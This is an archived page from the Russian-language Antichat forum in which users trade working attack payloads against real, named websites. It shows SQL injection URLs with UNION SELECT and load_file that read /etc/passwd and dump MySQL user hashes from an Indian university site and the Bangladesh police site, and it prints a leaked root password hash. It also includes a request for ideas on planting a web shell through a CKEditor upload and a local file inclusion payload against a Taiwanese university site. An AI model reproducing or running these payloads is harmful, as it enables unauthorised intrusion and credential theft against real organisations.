ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

05.11.2016, 17:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 8589
Репутация:
0
|
|
|
|
|
|

05.11.2016, 17:47
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
Сообщение от qqq1457
qqq1457 said:
↑
1
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+Un ioN+SeLect+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12--+
или
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+Un ioN+SeLect+1,load_file(0x2F6574632F706173737764),3 ,4,5,6,7,8,9,10,11,12--+
где 0x2F6574632F706173737764= hex(/etc/passwd)
2
нет доступа к mysql.user то есть нет возможности прочитать файл,несмотря на то что пользователь root, root'ом не является
http://www.naval.iitkgp.ernet.in/me...rd),3,4,5,6,7,8,9,10,11,12+from+mysql.user--+
root:*29EAFC3EEB29D66A3630CAA03C557B3083B2975B
всё там нормально
|
|
|

05.11.2016, 17:50
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
Сообщение от qqq1457
qqq1457 said:
↑
havij видит что то
http://prnt.sc/d3e4kj
но увы mysql=4.0.27
в ручную пока не могу составить запрос
Это я видел. Должен быть вывод....
|
|
|

05.11.2016, 17:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 8589
Репутация:
0
|
|
Сообщение от DezMond™
DezMond™ said:
↑
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+Un ioN+SeLect+1,concat_ws(0x3a,user,password),3,4,5,6 ,7,8,9,10,11,12+from+mysql.user--+
root:*29EAFC3EEB29D66A3630CAA03C557B3083B2975B
всё там нормально
я про 2 вариант
http://www.police.gov.bd/Police-act...user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-
|
|
|
|

05.11.2016, 18:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Спасибо кто откликнулся.
В первом сайте интересен запрос table_name from information_schema.tables where table_name=database()/
в втором сайте интересней чтение файла. Сори а то что сразу не смог задать нормально вопрос.
|
|
|
|

08.11.2016, 07:19
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме: 58603
Репутация:
3
|
|
Всем привет!
На странице есть ckeditor с возможностью загружать файлы на сервер.
- заливать можно всё
- имена файлов переименовывается, так что залить .htaccess не получится
- имена после заливки известны
- php, php3, phtml (возможно и другие, больше не пробовал, боюсь мою кучу говна скоро обнаружат) не выполняются, скачиваются
- shtml открывается, но так же не выполняется (судя по всему там хрен что выполняется)
Свои идеи иссякли, а останавливаться на достигнутом не хочется, так что прошу поделиться идеями, размышлениями на тему заливки рабочего шелла и т.п. вещей.
Не уверен что с html+js можно что-то придумать, может какой perl сгодится или еще что, но в этом я уже не силен.
Да кстати, хоть ckeditor версии 4.0.1, толку от этого нет, т.к. папка samples отсутствует.
И еще проверил pl, чтоб наверняка, тоже понятное дело скачивается.
|
|
|

08.11.2016, 09:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 61136
Репутация:
32
|
|
Помогите раскрутить LFI
_ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd
|
|
|
|

08.11.2016, 18:50
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме: 44902
Репутация:
0
|
|
Сообщение от WallHack
WallHack said:
↑
Помогите раскрутить LFI
_ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd
?page=file:///etc/passwd
|
|
|

08.11.2016, 18:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от ZodiaX
ZodiaX said:
↑
?page=file:///etc/passwd
Вроде как указал автор работает. Не очень понятно что требуется
|
|
|
|

08.11.2016, 20:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 8589
Репутация:
0
|
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|